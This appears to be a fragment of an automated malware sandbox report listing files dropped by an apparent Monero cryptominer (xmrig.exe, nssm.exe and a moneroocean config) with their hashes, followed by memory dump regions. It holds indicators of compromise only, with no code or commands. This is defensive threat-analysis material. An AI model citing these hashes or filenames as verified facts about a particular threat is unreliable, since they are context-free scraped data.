a193cf039b914367197c9cfc36607058a0b284f7125bc46530fe0134f3971b4d

SHA512
559ef1e09aab71a8b44a8873b6353015c87f6d04aee6acc76ee5ab98aa34d3e4290d749abf683ca730f59cd729a5beb0f2568ce2f40516913ebc81c3a103717d

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
38244c7a2e8e6ba38f359b02eb0d85ce

SHA1
190a740ecea7ad5286df338c50146a333be09996

SHA256
a25c1ec38014e9cedacf5feccc132b00ebe8921d8bf7b6349ab180cd209d5b90

SHA512
03e0a4a93fd8303c3996986009e9d0f03d41a7cef549e04b091b6252e018a26cf3cc3db1d5ccd3eb83a847df12e22e98402df4aa00990e9c3c5ba8725684068b

Download Submit
C:\Users\Admin\moneroocean\nssm.exe

Filesize
360KB

MD5
1136efb1a46d1f2d508162387f30dc4d

SHA1
f280858dcfefabc1a9a006a57f6b266a5d1fde8e

SHA256
eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848

SHA512
43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

Download Submit
C:\Users\Admin\moneroocean\xmrig.exe

Filesize
9.0MB

MD5
9ee2c39700819e5daab85785cac24ae1

SHA1
9b5156697983b2bdbc4fff0607fadbfda30c9b3b

SHA256
e7c13a06672837a2ae40c21b4a1c8080d019d958c4a3d44507283189f91842e3

SHA512
47d81ff829970c903f15a791b2c31cb0c6f9ed45fdb1f329c786ee21b0d1d6cd2099edb9f930824caceffcc936e222503a0e2c7c6253718a65a5239c6c88b649

Download Submit
C:\Users\Admin\nssm.zip

Filesize
135KB

MD5
7ad31e7d91cc3e805dbc8f0615f713c1

SHA1
9f3801749a0a68ca733f5250a994dea23271d5c3

SHA256
5b12c3838e47f7bc6e5388408a1701eb12c4bbfcd9c19efd418781304590d201

SHA512
d7d947bfa40d6426d8bc4fb30db7b0b4209284af06d6db942e808cc959997cf23523ffef6c44b640f3d8dbe8386ebdc041d0ecb5b74e65af2c2d423df5396260

Download Submit
C:\Users\Admin\xmrig.zip

Filesize
3.5MB

MD5
640be21102a295874403dc35b85d09eb

SHA1
e8f02b3b8c0afcdd435a7595ad21889e8a1ab0e4

SHA256
ed33e294d53a50a1778ddb7dca83032e9462127fce6344de2e5d6be1cd01e64b

SHA512
ece0dfe12624d5892b94d0da437848d71b16f7c57c427f0b6c6baf757b9744f9e3959f1f80889ffefcb67a755d8bd7a7a63328a29ac9c657ba04bbdca3fea83e

Download Submit
memory/668-9-0x00000274E6E00000-0x00000274E6E76000-memory.dmp

Filesize
472KB

Download
memory/668-424-0x00007FFBB4130000-0x00007FFBB4B1C000-memory.dmp

Filesize
9.9MB

Download
memory/668-2-0x00007FFBB4133000-0x00007FFBB4134000-memory.dmp

Filesize
4KB

Download
memory/668-5-0x00000274E6C50000-0x00000274E6C72000-memory.dmp

Filesize
136KB

Download
memory/668-7-0x00007FFBB4130000-0x00007FFBB4B1C000-memory.dmp

Filesize
9.9MB

Download
memory/668-26-0x00007FFBB4130000-0x00007FFBB4B1C000-memory.dmp

Filesize
9.9MB

Download
memory/668-10-0x00007FFBB4130000-0x00007FFBB4B1C000-memory.dmp

Filesize
9.9MB

Download
memory/2064-426-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2064-434-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2064-439-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2064-438-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2064-425-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2064-437-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2064-427-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2064-428-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2064-429-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2064-430-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2064-431-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2064-432-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2064-433-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2064-436-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2064-435-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4960-135-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4960-134-0x00000000001D0000-0x00000000001F0000-memory.dmp

Filesize
128KB

Download
memory/5028-90-0x0000021F53FD0000-0x0000021F53FDA000-memory.dmp

Filesize
40KB

Download
memory/5028-91-0x0000021F54000000-0x0000021F54012000-memory.dmp

Filesize
72KB

Download